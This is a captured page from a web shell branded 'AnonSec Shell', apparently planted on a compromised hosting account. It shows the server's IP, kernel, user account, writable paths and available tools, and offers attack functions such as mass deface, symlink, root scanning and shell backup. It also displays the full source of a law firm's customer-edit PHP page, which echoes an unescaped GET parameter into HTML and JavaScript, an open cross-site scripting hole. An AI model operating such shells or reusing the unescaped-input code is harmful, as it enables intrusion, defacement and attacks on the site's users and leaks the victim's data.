AnonSec Shell
Server IP : 104.21.37.246  /  Your IP : 172.71.28.145   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/cp648411/www/ilawasia.onnud20.com/Customer/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/cp648411/www/ilawasia.onnud20.com/Customer/Edit.php
<?php $path = '../'; ?>
<?php $page="Customer"; ?>
<?php $page_title="Customer List"; ?>
<?php include("../include/class.php"); ?>
<?php include($path."include/head.php"); ?>

<body id="page-top">
    <!-- Page Wrapper -->
    <div id="wrapper">
        <!-- Sidebar -->
        <?php include($path."themes/menu-left.php"); ?>

        <!-- End of Sidebar -->
        <!-- Content Wrapper -->
        <div id="content-wrapper" class="d-flex flex-column">
            <!-- Topbar -->
            <?php include($path."themes/menu-top.php"); ?>
            <!-- End of Topbar -->
            <!-- Begin Page Content -->
            <div class="container-fluid main-content">
              <input type="hidden" id="page-menu-id" name="" value="#menu_case" />
              <div class="d-sm-flex align-items-center justify-content-between mb-4">
                  <h1 class="h3 mb-0 text-gray-800">แก้ไข Customer</h1>
              </div>

              <?php if(@$_SESSION['er']){ ?>
                <div class="alert alert-danger">
                  <?php echo "Error ! ไม่สามารถทำการบันทึกข้อมูลได้"; ?>
                </div>
              <?php } ?>

              <?php if(@$_SESSION['Success']!=''){ ?>
                <div class="alert alert-success">
                    <?php echo @$_SESSION['Success']; ?>
                </div>
              <?php } ?>


              <form  action="Update.php" method="post" enctype="multipart/form-data">
                <?php include("form.php"); ?>
              </form>
                <!-- Modal Counter-->
              <div class="modal fade" id="counterModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
                  <div class="modal-dialog modal-lg" role="document">
                      <div class="modal-content">
                          <div class="modal-header">
                              <h5 class="modal-title">Add Counter Party</h5>
                              <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                                  <span aria-hidden="true">&times;</span>
                              </button>
                          </div>
                          <form action="CreateCounter.php" id="counter-form" method="post" enctype="multipart/form-data">
                              <div class="modal-body">

                                  <div class="row">
                                      <div class="col-md-2">Name <sup class="text-danger">*</sup></div>
                                      <div class="col-md-4">
                                        <input type="text" class="form-control" name="CounterName" id="txt_counter_name">
                                      </div>
                                      <div class="col-md-2">Tax ID <sup class="text-danger">*</sup></div>
                                      <div class="col-md-4">
                                        <input type="text" class="form-control" name="CounterTaxId" id="txt_counter_taxid">
                                      </div>
                                      
                                  </div>
                                  &nbsp;
                                  <div class="row">
                                      <div class="col-md-2">Address <sup class="text-danger">*</sup></div>
                                      <div class="col-md-4">
                                          <input type="text" class="form-control" name="CounterAddress" id="txt_counter_address" />
                                      </div>                                      
                                  </div>
                                  &nbsp;
                                  <input type="hidden" name="NamesId" value="<?php echo @$_GET['Id']; ?>">

                              </div>
                              <div class="modal-footer">
                                  <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
                                  <button class="btn btn-primary">Confirm</button>
                              </div>
                          </form>

                      </div>
                  </div>
              </div>
              <script>
                  var urlLoadRelatedCase = "LoadRelatedCase.php";
                  var customerId = "<?php echo @$_GET['Id']; ?>";
                  var urlCaseEdit = "Edit_caselist.php";
                  var urlLoadCounter = "LoadCounter.php";
              </script>
              <script src="<?php echo $path; ?>Scripts/pages_v1/customer2.js"></script>
            </div>
          <!-- End of Page Content -->
          <!-- Footer -->
          <footer class="sticky-footer bg-white">
              <div class="container my-auto">
                  <div class="copyright text-center my-auto">
                      <span>Copyright &copy;  ILAW CO., LTD.</span>
                  </div>
              </div>
          </footer>
          <!-- End of Footer -->
        </div>
      <!--End of Content Wrapper -->

      </div>
      <!-- End of Page Wrapper -->
      <!-- Scroll to Top Button-->
      <a class="scroll-to-top rounded" href="#page-top">
      <i class="fas fa-angle-up"></i>
      </a>
      <?php unset($_SESSION['Success']); ?>
      <?php unset($_SESSION['er']); ?>
      <?php include($path."include/footer_js.php"); ?>

    </body>
</html>

Anon7 - 2022
AnonSec Team